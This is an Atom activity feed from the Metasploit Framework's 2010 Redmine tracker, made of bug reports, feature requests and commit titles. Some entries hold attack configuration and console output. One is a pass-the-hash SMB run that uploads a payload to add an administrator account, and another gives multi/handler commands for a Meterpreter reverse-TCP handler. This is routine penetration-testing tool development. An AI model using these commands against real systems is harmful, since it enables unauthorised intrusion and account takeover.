<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">
  <title>Metasploit Framework: Activity</title>
  
  <link href="http://www.metasploit.com/redmine/projects/framework/activity" rel="alternate" />
  <id>http://www.metasploit.com/redmine/</id>
  <updated>2010-09-01T20:15:37-07:00</updated>
  <author>
    <name>Metasploit Redmine Interface</name>
  </author>
  <generator uri="http://www.redmine.org/">
Redmine  </generator>
  <atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/metasploit/development" /><feedburner:info uri="metasploit/development" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry>
    <title>Bug #2482 (New): Microsoft Windows Authenticated User Code Execution with Windows Add User Payload</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/2g0fr1B0O8k/2482" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2482</id>
    <updated>2010-09-01T20:15:37-07:00</updated>
    <author>
      <name>john grisham</name>
    </author>
    <content type="html">
&lt;p&gt;Hi,&lt;/p&gt;


	&lt;p&gt;I was trying the above exploit using a NTLM hash to exploit and then deploying windows adduser payload&lt;br /&gt;Connection (445) was established between the attacking machine and the target machine.&lt;br /&gt;However, the account was not created on the target machine. Is this exploit limited to the kinds of payload we can deploy?&lt;/p&gt;


	&lt;p&gt;Note: I have physical access to both machine, and on the targetted machine, the account was not created although a 445 session was established between the attacking and target machine.&lt;/p&gt;


	&lt;p&gt;Name Current Setting Required Description&lt;br /&gt;---- --------------- -------- -----------&lt;br /&gt;RHOST 10.10.10.10 yes The target address&lt;br /&gt;RPORT 445 yes Set the SMB service port&lt;br /&gt;SMBDomain WORKGROUP no The Windows domain to use for authentication&lt;br /&gt;SMBPass 00000000000000000000000000000000:E3D386D6673369E87139D020D653218E no The password for the specified username&lt;br /&gt;SMBUser Administrator no The username to authenticate as&lt;/p&gt;


	&lt;p&gt;Payload options (windows/adduser):&lt;/p&gt;


	&lt;p&gt;Name      Current Setting  Required  Description&lt;br /&gt;   ----      ---------------  --------  -----------&lt;br /&gt;   EXITFUNC  process          yes       Exit technique: seh, thread, process&lt;br /&gt;   PASS      test123          yes       The password for this user&lt;br /&gt;   USER      test123          yes       The username to create&lt;/p&gt;


	&lt;p&gt;[*] Connecting to the server...&lt;br /&gt;[*] Authenticating as user 'ADministrator'...&lt;br /&gt;[*] Uploading payload...&lt;br /&gt;[*] Created \DkysLinS.exe...&lt;br /&gt;[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...&lt;br /&gt;[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...&lt;br /&gt;[*] Obtaining a service manager handle...&lt;br /&gt;[*] Creating a new service (hjTkQCQp - "MrsMgvquMqVIwuWWTZLIAlXkQPCB")...&lt;br /&gt;[*] Closing service handle...&lt;br /&gt;[*] Opening service...&lt;br /&gt;[*] Starting the service...&lt;br /&gt;[*] Removing the service...&lt;br /&gt;[*] Closing service handle...&lt;br /&gt;[*] Deleting \DkysLinS.exe...&lt;br /&gt;[*] Exploit completed, but no session was created.&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/2g0fr1B0O8k" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2482</feedburner:origLink></entry>
  <entry>
    <title>Bug #2481 (New): "O" option no longer works with msfpayload</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/_E2XL28XrKE/2481" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2481</id>
    <updated>2010-09-01T19:02:55-07:00</updated>
    <author>
      <name>Jeremy Faircloth</name>
    </author>
    <content type="html">
&lt;p&gt;When using the O option, msfpayload responds by generating the raw output of the payload. e.g. "./msfpayload /windows/shell_bind_tcp O" in prior versions would show which options are available for the payload. The same result (raw output)is obtained using the S option.&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/_E2XL28XrKE" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2481</feedburner:origLink></entry>
  <entry>
    <title>Revision 10216: Whoops forgot the x.</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/FFEl9qwMZO4/10216" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10216</id>
    <updated>2010-09-01T16:26:35-07:00</updated>
    <author>
      <name>Tod Beardsley</name>
      <email>todb@metasploit.com</email>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/FFEl9qwMZO4" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10216</feedburner:origLink></entry>
  <entry>
    <title>Feature #2480 (New): Addition of the Alpha3 Encoder</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/356Rcg0-Gic/2480" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2480</id>
    <updated>2010-09-01T15:47:08-07:00</updated>
    <author>
      <name>Devon Kearns</name>
    </author>
    <content type="html">
&lt;p&gt;Since the Alpha3 Encoder apparently has a smaller decoder and the additional encoding options, it could be a good addition to MSF.&lt;/p&gt;


	&lt;p&gt;&lt;a class="external" href="http://code.google.com/p/alpha3/"&gt;http://code.google.com/p/alpha3/&lt;/a&gt;&lt;br /&gt;"The improvements over ALPHA2 include new encodings (x86 lowercase ascii and x64 mixedcase ascii) and smaller decoders for various other encodings."&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/356Rcg0-Gic" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2480</feedburner:origLink></entry>
  <entry>
    <title>Revision 10214: Adds xml_char_encode. Like html_encode, but allows xml-safe character through.</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/hQ6qvpYlFsw/10214" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10214</id>
    <updated>2010-09-01T15:40:07-07:00</updated>
    <author>
      <name>Tod Beardsley</name>
      <email>todb@metasploit.com</email>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/hQ6qvpYlFsw" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10214</feedburner:origLink></entry>
  <entry>
    <title>Revision 10213: Handle updating the updated_at time for just-checked credentials better.</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/zWhqxUsWTV8/10213" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10213</id>
    <updated>2010-09-01T15:06:52-07:00</updated>
    <author>
      <name>Tod Beardsley</name>
      <email>todb@metasploit.com</email>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/zWhqxUsWTV8" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10213</feedburner:origLink></entry>
  <entry>
    <title>Feature #2306: ARM payload - Linux Execute Command</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/m_fG8f8sBFs/2306" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2306#change-9322</id>
    <updated>2010-09-01T02:26:10-07:00</updated>
    <author>
      <name>Jonathan Salwan</name>
    </author>
    <content type="html">
&lt;p&gt;Hi Joshua,&lt;/p&gt;


	&lt;p&gt;Try with new attached file.&lt;/p&gt;


	&lt;p&gt;regards,&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/m_fG8f8sBFs" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2306#change-9322</feedburner:origLink></entry>
  <entry>
    <title>Bug #2474: Microsoft Windows Authenticated User Code Execution with Windows Add User Payload</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/rLnoy7oE7QM/2474" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2474#change-9321</id>
    <updated>2010-09-01T02:26:02-07:00</updated>
    <author>
      <name>john grisham</name>
    </author>
    <content type="html">
&lt;p&gt;Revision 10155&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/rLnoy7oE7QM" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2474#change-9321</feedburner:origLink></entry>
  <entry>
    <title>Bug #2474 (New): Microsoft Windows Authenticated User Code Execution with Windows Add User Payload</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/42KXXjnKiJ0/2474" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2474</id>
    <updated>2010-09-01T01:54:44-07:00</updated>
    <author>
      <name>john grisham</name>
    </author>
    <content type="html">
&lt;p&gt;Hi,&lt;/p&gt;


	&lt;p&gt;I was trying the above exploit using a NTLM hash to exploit and then deploying windows adduser payload&lt;br /&gt;Connection (445) was established between the attacking machine and the target machine. &lt;br /&gt;However, the account was not created on the target machine. Is this exploit limited to the kinds of payload we can deploy?&lt;/p&gt;


	&lt;p&gt;Note: I have physical access to both machine, and on the targetted machine, the account was not created although a 445 session was established between the attacking and target machine.&lt;/p&gt;


	&lt;p&gt;Name       Current Setting                                                    Required  Description&lt;br /&gt;   ----       ---------------                                                    --------  -----------&lt;br /&gt;   RHOST      10.10.10.10                                                         yes      The target address&lt;br /&gt;   RPORT      445                                                                    yes       Set the SMB service port&lt;br /&gt;   SMBDomain  WORKGROUP                                                           no        The Windows domain to use for authentication&lt;br /&gt;   SMBPass    00000000000000000000000000000000:E3D386D6673369E87139D020D653218E   no        The password for the specified username&lt;br /&gt;   SMBUser    Administrator                                                       no        The username to authenticate as&lt;/p&gt;


	&lt;pre&gt;&lt;code&gt;Payload options (windows/adduser):&lt;/code&gt;&lt;/pre&gt;


	&lt;pre&gt;&lt;code&gt;Name      Current Setting  Required  Description&lt;br /&gt;   ----      ---------------  --------  -----------&lt;br /&gt;   EXITFUNC  process          yes       Exit technique: seh, thread, process&lt;br /&gt;   PASS      test123          yes       The password for this user&lt;br /&gt;   USER      test123          yes       The username to create&lt;/code&gt;&lt;/pre&gt;


	&lt;p&gt;[*] Connecting to the server...&lt;br /&gt;[*] Authenticating as user 'ADministrator'...&lt;br /&gt;[*] Uploading payload...&lt;br /&gt;[*] Created \DkysLinS.exe...&lt;br /&gt;[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...&lt;br /&gt;[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...&lt;br /&gt;[*] Obtaining a service manager handle...&lt;br /&gt;[*] Creating a new service (hjTkQCQp - "MrsMgvquMqVIwuWWTZLIAlXkQPCB")...&lt;br /&gt;[*] Closing service handle...&lt;br /&gt;[*] Opening service...&lt;br /&gt;[*] Starting the service...&lt;br /&gt;[*] Removing the service...&lt;br /&gt;[*] Closing service handle...&lt;br /&gt;[*] Deleting \DkysLinS.exe...&lt;br /&gt;[*] Exploit completed, but no session was created.&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/42KXXjnKiJ0" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2474</feedburner:origLink></entry>
  <entry>
    <title>Bug #2418: Complete support for the POSIX Meterpreter</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/Qv0vQKcnWKE/2418" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2418#change-9319</id>
    <updated>2010-08-31T23:36:18-07:00</updated>
    <author>
      <name>philip sanderson</name>
    </author>
    <content type="html">
&lt;p&gt;ext_server_stdapi.so needs to go to data/meterpreter/ext_server_stdapi.so&lt;br /&gt;msflinker.bin needs to go to data/msflinker_linux_x86.bin (see modules/payloads/stages/linux/x86/meterpreter.rb)&lt;/p&gt;


	&lt;p&gt;msflinker = raw binary. will default to 127.0.0.1:4444, so you can test it with&lt;/p&gt;


&lt;pre&gt;
use multi/handler
set PAYLOAD linux/x86/metsvc_reverse_tcp
set LHOST 127.0.0.1
exploit
&lt;/pre&gt;

&lt;pre&gt;
./msflinker
&lt;/pre&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/Qv0vQKcnWKE" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2418#change-9319</feedburner:origLink></entry>
  <entry>
    <title>Bug #2418: Complete support for the POSIX Meterpreter</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/jtcDU4z62Pw/2418" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2418#change-9318</id>
    <updated>2010-08-31T20:35:31-07:00</updated>
    <author>
      <name>philip sanderson</name>
    </author>
    <content type="html">
&lt;p&gt;I will go through the build process information in the documentation I wrote to see what's missing / could be improved. As for automating it completely, that should be possible.&lt;/p&gt;


	&lt;p&gt;What distribution are you building on? I'm using ubuntu 10.04.&lt;/p&gt;


	&lt;p&gt;I'll attach binaries shortly&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/jtcDU4z62Pw" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2418#change-9318</feedburner:origLink></entry>
  <entry>
    <title>Revision 10211: fix a typo</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/w0K6E8ZmDfg/10211" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10211</id>
    <updated>2010-08-31T18:57:22-07:00</updated>
    <author>
      <name>Chris Gates</name>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/w0K6E8ZmDfg" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10211</feedburner:origLink></entry>
  <entry>
    <title>Revision 10210: put scanner modules in the scanner directory</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/zB7p7it8mYU/10210" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10210</id>
    <updated>2010-08-31T18:49:06-07:00</updated>
    <author>
      <name>Chris Gates</name>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/zB7p7it8mYU" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10210</feedburner:origLink></entry>
  <entry>
    <title>Revision 10209: coldfusion directory traversal module</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/rp8lm2o1vwk/10209" rel="alternate" />
    <id>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10209</id>
    <updated>2010-08-31T18:43:48-07:00</updated>
    <author>
      <name>Chris Gates</name>
    </author>
    <content type="html">
    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/rp8lm2o1vwk" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/projects/framework/repository/revisions/10209</feedburner:origLink></entry>
  <entry>
    <title>Bug #2465 (Resolved): msfrpcd has activerecord weirdness</title>
    <link href="http://feedproxy.google.com/~r/metasploit/development/~3/1U33cSsaqGU/2465" rel="alternate" />
    <id>http://www.metasploit.com/redmine/issues/2465#change-9317</id>
    <updated>2010-08-31T16:24:57-07:00</updated>
    <author>
      <name>scriptjunkie -</name>
    </author>
    <content type="html">
&lt;p&gt;Applied in changeset &lt;a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/10207" class="changeset" title="Initialize framework after forking when running msfrpcd as a daemon. Fixes #2465 by running datab..."&gt;r10207&lt;/a&gt;.&lt;/p&gt;    &lt;img src="http://feeds.feedburner.com/~r/metasploit/development/~4/1U33cSsaqGU" height="1" width="1"/&gt;</content>
  <feedburner:origLink>http://www.metasploit.com/redmine/issues/2465#change-9317</feedburner:origLink></entry>
</feed>
